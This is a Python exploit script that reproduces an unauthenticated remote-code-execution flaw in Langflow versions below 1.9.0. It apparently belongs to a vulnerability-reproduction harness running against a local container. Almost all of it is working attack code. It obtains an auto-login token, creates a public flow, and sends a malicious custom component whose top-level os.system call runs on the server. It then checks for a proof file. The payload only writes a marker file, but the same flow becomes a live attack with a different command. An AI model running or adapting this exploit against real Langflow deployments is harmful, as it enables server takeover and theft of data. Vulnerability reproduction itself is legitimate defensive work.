#!/usr/bin/env python3
"""CVE-2026-33017 exploit helper - runs INSIDE the langflow container.

Invoked by reproduction_steps.sh via:
    docker exec -e ROLE=<role> -e TOKEN=<token> -e PROOF_TAG=<tag> <container> python3 /tmp/repro_attempt.py

Performs the full unauthenticated-RCE flow against the local langflow server
(http://127.0.0.1:7860):
  1. Wait for /health
  2. GET /api/v1/auto_login  -> access_token (AUTO_LOGIN=true)
  3. POST /api/v1/flows/      -> create a PUBLIC flow (id)
  4. POST /api/v1/build_public_tmp/{flow_id}/flow  with Cookie client_id + a
     custom component whose top-level code runs os.system() to drop a proof file
  5. Poll for the proof file and emit a JSON result on stdout.

On vulnerable langflow (<1.9.0) the attacker-supplied `data` is passed to
start_flow_build() and the custom component code is exec()'d via
prepare_global_scope()/create_class() at graph-build time, so the proof file is
written. On fixed langflow (>=1.9.0) the endpoint hardcodes data=None and loads
the stored (benign) flow from the database, so no attacker code runs.
"""
import json
import os
import sys
import time
import urllib.error
import urllib.request

BASE = "http://127.0.0.1:7860"
TOKEN = os.environ.get("TOKEN", "repro")
ROLE = os.environ.get("ROLE", "vuln")
PROOF = "/tmp/rce-proof"


def req(method, path, headers=None, body=None, timeout=30):
    url = BASE + path
    data = json.dumps(body).encode("utf-8") if body is not None else None
    r = urllib.request.Request(url, data=data, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(r, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")
    except urllib.error.URLError as e:
        return 0, str(e)


def wait_health(timeout=240):
    deadline = time.time() + timeout
    while time.time() < deadline:
        try:
            st, _ = req("GET", "/health", timeout=10)
            if st == 200:
                return True
        except Exception:
            pass
        time.sleep(2)
    return False


def make_malicious_flow(token):
    """Build a flow with one CustomComponent node carrying an os.system payload.

    The top-level assignment `_rce = os.system(...)` is an ast.Assign node which
    prepare_global_scope() collects and exec()'s at graph-build time.
    """
    code = (
        "from langflow.custom import Component\n"
        "from langflow.io import MessageTextInput, Output\n"
        "from langflow.schema import Data\n"
        "import os\n"
        f"_rce = os.system(\"id > {PROOF} 2>&1 && echo 'RCE_CONFIRMED {token}' >> {PROOF}\")\n"
        "\n"
        "class RCEComponent(Component):\n"
        '    display_name = "RCE Component"\n'
        '    description = "demo"\n'
        '    icon = "custom_components"\n'
        "    inputs = [MessageTextInput(name=\"input_value\", display_name=\"Input\")]\n"
        "    outputs = [Output(display_name=\"Output\", name=\"output\", method=\"build_output\")]\n"
        "    def build_output(self) -> Data:\n"
        "        return Data(value=self.input_value)\n"
    )
    node = {
        "id": "CustomComponent-rce-1",
        "type": "CustomComponent",
        "data": {
            "id": "CustomComponent-rce-1",
            "type": "RCEComponent",
            "node": {
                "base_classes": ["Data"],
                "display_name": "RCE Component",
                "description": "demo",
                "icon": "custom_components",
                "outputs": [
                    {
                        "display_name": "Output",
                        "name": "output",
                        "method": "build_output",
                        "types": ["Data"],
                        "cache": True,
                        "allows_loop": False,
                        "group_outputs": False,
                        "hidden": None,
                        "loop_types": None,
                        "options": None,
                        "required_inputs": None,
                        "selected": "Data",
                        "tool_mode": False,
                        "value": "__UNDEFINED__",
                    }
                ],
                "template": {
                    "_type": "Component",
                    "code": {
                        "type": "code",
                        "value": code,
                        "required": True,
                        "dynamic": True,
                        "show": True,
                        "advanced": True,
                        "multiline": True,
                        "name": "code",
                        "display_name": "Code",
                    },
                    "input_value": {
                        "_input_type": "MessageTextInput",
                        "type": "str",
                        "name": "input_value",
                        "display_name": "Input",
                        "value": "hello",
                        "required": False,
                        "show": True,
                    },
                },
            },
        },
    }
    return {"nodes": [node], "edges": []}


def main():
    result = {"role": ROLE, "token": TOKEN, "endpoint": "public", "error": None}
    if os.path.exists(PROOF):
        os.remove(PROOF)

    if not wait_health():
        result["error"] = "health check failed"
        print(json.dumps(result))
        sys.exit(1)
    result["healthcheck_passed"] = True

    # 1. unauthenticated auto-login (AUTO_LOGIN=true issues a superuser session)
    st, body = req("GET", "/api/v1/auto_login")
    result["auto_login_status"] = st
    if st != 200:
        result["error"] = f"auto_login failed: {body[:200]}"
        print(json.dumps(result))
        sys.exit(1)
    access_token = json.loads(body).get("access_token")
    if not access_token:
        result["error"] = "no access_token in auto_login response"
        print(json.dumps(result))
        sys.exit(1)
    result["access_token"] = True
    auth = {"Authorization": f"Bearer {access_token}", "Content-Type": "application/json"}

    # 2. create a PUBLIC flow so build_public_tmp accepts it. The stored data is
    #    benign and unused on the vulnerable path (attacker `data` overrides it).
    flow_body = {"name": f"exploit-flow-{TOKEN}", "data": {"nodes": [], "edges": []}, "access_type": "PUBLIC"}
    st, body = req("POST", "/api/v1/flows/", headers=auth, body=flow_body)
    result["create_flow_status"] = st
    if st not in (200, 201):
        result["error"] = f"create_flow failed: {body[:300]}"
        print(json.dumps(result))
        sys.exit(1)
    flow_id = json.loads(body).get("id")
    if not flow_id:
        result["error"] = f"no flow id: {body[:300]}"
        print(json.dumps(result))
        sys.exit(1)
    result["flow_id"] = flow_id

    # 3. exploit: unauthenticated POST to the public build endpoint with attacker
    #    `data` carrying the malicious custom component + a client_id cookie.
    malicious = make_malicious_flow(TOKEN)
    exploit_headers = {"Content-Type": "application/json", "Cookie": f"client_id={TOKEN}"}
    st, body = req("POST", f"/api/v1/build_public_tmp/{flow_id}/flow", headers=exploit_headers, body={"data": malicious})
    result["exploit_status"] = st
    result["exploit_body"] = body[:500]

    # 4. poll for the proof file written by os.system() inside the container.
    proof_exists = False
    proof_content = None
    for _ in range(25):
        if os.path.exists(PROOF):
            proof_exists = True
            proof_content = open(PROOF).read().strip()
            break
        time.sleep(1)
    result["proof_exists"] = proof_exists
    result["proof_content"] = proof_content
    result["success"] = bool(proof_exists and TOKEN in (proof_content or ""))
    print(json.dumps(result))
    sys.exit(0 if result["success"] else 1)


if __name__ == "__main__":
    main()
